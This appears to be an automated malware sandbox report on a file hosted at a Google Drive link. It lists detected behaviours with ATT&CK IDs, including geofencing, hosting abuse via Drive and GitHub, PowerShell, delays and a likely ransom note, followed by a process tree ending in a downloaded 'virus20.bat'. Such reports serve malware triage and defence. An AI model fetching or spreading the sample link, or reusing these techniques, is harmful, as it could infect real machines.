hxxps://drive[.]google[.]com/file/d/1dBHPdN0tDkjBOufr8gJq0dEcF0ZocT1G/view?usp=sharing

Analysis

max time kernel
185s
max time network
195s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
07-07-2024 23:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/file/d/1dBHPdN0tDkjBOufr8gJq0dEcF0ZocT1G/view?usp=sharing

Score

7^/10

execution

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International\Geo\Nation	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
10	drive.google.com
149	raw.githubusercontent.com
150	raw.githubusercontent.com

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5628	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
6060	timeout.exe
5756	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133648669480649925"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2494989678-839960665-2515455429-1000\{FBE970E6-8072-46AC-B159-73520A53AE85}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000_Classes\Local Settings	cmd.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 901738.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 246385.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3424	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
2712	msedge.exe
2712	msedge.exe
2584	msedge.exe
2584	msedge.exe
556	identity_helper.exe
556	identity_helper.exe
2172	msedge.exe
2172	msedge.exe
2704	msedge.exe
2704	msedge.exe
4848	chrome.exe
4848	chrome.exe
5556	msedge.exe
5556	msedge.exe
5628	powershell.exe
5628	powershell.exe
5628	powershell.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
4504	msedge.exe
4504	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs

pid	Process
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
4848	chrome.exe
4848	chrome.exe
2584	msedge.exe
4848	chrome.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeShutdownPrivilege	4848	chrome.exe
Token: SeCreatePagefilePrivilege	4848	chrome.exe
Token: SeDebugPrivilege	5628	powershell.exe
Token: SeShutdownPrivilege	2908	shutdown.exe
Token: SeRemoteShutdownPrivilege	2908	shutdown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
4848	chrome.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe
2584	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2584 wrote to memory of 4500	2584	msedge.exe	83
PID 2584 wrote to memory of 4500	2584	msedge.exe	83
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 1868	2584	msedge.exe	84
PID 2584 wrote to memory of 2712	2584	msedge.exe	85
PID 2584 wrote to memory of 2712	2584	msedge.exe	85
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86
PID 2584 wrote to memory of 2088	2584	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/file/d/1dBHPdN0tDkjBOufr8gJq0dEcF0ZocT1G/view?usp=sharing
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe61ca46f8,0x7ffe61ca4708,0x7ffe61ca4718
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:2
  2⤵
  PID:1868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:8
  2⤵
  PID:2088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
  2⤵
  PID:4604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:2040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
  2⤵
  PID:3216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
  2⤵
  PID:1480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5648 /prefetch:8
  2⤵
  PID:828
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
  2⤵
  PID:3984
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6260 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
  2⤵
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
  2⤵
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
  2⤵
  PID:1568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
  2⤵
  PID:2224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6540 /prefetch:8
  2⤵
  PID:2816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5704 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
  2⤵
  PID:3900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7116 /prefetch:1
  2⤵
  PID:1568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1
  2⤵
  PID:2704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
  2⤵
  PID:3172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
  2⤵
  PID:5380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3132 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1256 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1340 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
  2⤵
  PID:4124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2244,4411466138677372241,7405676935859678905,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\virus20.bat" "
  2⤵
  PID:3160

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2212

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4728

C:\Windows\System32\rundll32.exe
